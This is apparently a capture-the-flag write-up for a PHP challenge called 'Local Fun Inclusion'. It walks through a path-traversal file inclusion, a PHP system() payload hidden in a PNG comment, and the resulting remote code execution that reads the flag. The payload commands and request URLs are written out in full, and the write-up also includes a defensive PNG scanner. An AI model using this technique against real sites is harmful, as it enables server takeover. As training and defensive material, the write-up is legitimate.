Web - Local Fun Inclusion

  • local file inclusion
  • path traversal in site argument
  • get a list of mounts from /proc/self/mountinfo to identify where the webserver's document root is mounted

view-source:http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../proc/self/mountinfo&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png

1007 984 253:0 /opt/local_fun_inclusion/website/src /var/www/site ro,relatime - xfs /dev/mapper/cl_hax1-root rw,seclabel,attr2,inode64,noquota

  • the uploaded files can be included raw here:

http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../var/www/site/uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png

Seems like we can view our images without them being in an image tag, but can we execute code?

Well, the server treats everything it includes as PHP as long as the file contains the magic <? opening tag, so we can insert <? system('uname -a'); ?> into a PNG comment as seen below:

$ convert black.png -set comment "<? system('uname -a');?>" out.png

Uploading out.png and including it through the LFI returns the raw PNG bytes, with the PHP tag in the tEXt comment chunk replaced by the output of uname -a (the binary chunks are omitted here). The PNG comment extracted:

commentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
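Because include() parses any file it is handed for <? tags, an image that passes upload validation can still carry code. The following added example (not code from the write-up or the challenge) scans a PNG's chunks for PHP open tags, the kind of check an upload handler or a scanner of the uploads directory could run; the sample PNG it builds is constructed inline.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# PHP opens code on "<?php", "<?=" or a bare "<?" followed by whitespace (short_open_tag);
# "<?xml" / "<?xpacket" from XMP metadata deliberately do not match.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)

def iter_chunks(data):
    """Yield (chunk_type, body) for each chunk of a PNG byte string."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + body + 4 CRC
        if ctype == b"IEND":
            break

def find_php_tags(data):
    """Return [(chunk_type, keyword)] for every chunk carrying a PHP open tag.
    Every chunk is scanned, not only text chunks, because include() parses the whole file."""
    hits = []
    for ctype, body in iter_chunks(data):
        keyword = b""
        if ctype in (b"tEXt", b"zTXt", b"iTXt"):
            keyword, _, rest = body.partition(b"\x00")
            if ctype == b"zTXt":
                body = zlib.decompress(rest[1:])  # skip the compression-method byte
        if PHP_OPEN_TAG.search(body):
            hits.append((ctype.decode("ascii"), keyword.decode("latin-1")))
    return hits

def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_sample_png(comment=None):
    """Constructed 1x1 grayscale PNG, optionally carrying a 'comment' tEXt chunk
    like the one `convert -set comment` writes."""
    chunks = [_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))]
    if comment is not None:
        chunks.append(_chunk(b"tEXt", b"comment\x00" + comment))
    chunks.append(_chunk(b"IDAT", zlib.compress(b"\x00\x00")))  # one filter byte + one pixel
    chunks.append(_chunk(b"IEND", b""))
    return PNG_SIG + b"".join(chunks)
```

Rejecting such uploads is only defence in depth: the root cause is that the site parameter reaches include() unconstrained, and an allowlist of page names closes that regardless of what the images contain.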

As you can see, we've got code execution and know where the webserver's document root is, so let's list all files in /var/www/site:

convert black.png -set comment "<? system('ls -l /var/www/site/');?>" out.png
drwxr-xr-x. 2 root     root      168 Mar  2 22:51 css
-rw-r--r--. 1 root     root       57 Mar  2 22:51 flag.php
-rwxr-xr-x. 1 root     root     1813 Mar  2 22:51 index.php
drwxr-xr-x. 2 root     root      108 Mar  2 22:51 js
-rwxr-xr-x. 1 root     root     2802 Mar  2 22:51 upload.php
drwxr-xr-x. 2 www-data www-data  420 Mar  3 10:16 uploads
-rwxr-xr-x. 1 root     root      310 Mar  2 22:51 view.php

Let's read the content of flag.php!

<?php

$FLAG = "CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool}";

...

:::success CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool} :::


The LFI request used to include the uploaded payload image:

http://lfi.hax1.allesctf.net:8081/index.php?site=../../../../../../../../../var/www/site/uploads/c68271a63ddbc431c307beb7d2918275_1.png&image=uploads/1ffd9e753c8054cc61456ac7fac1ac89_3.png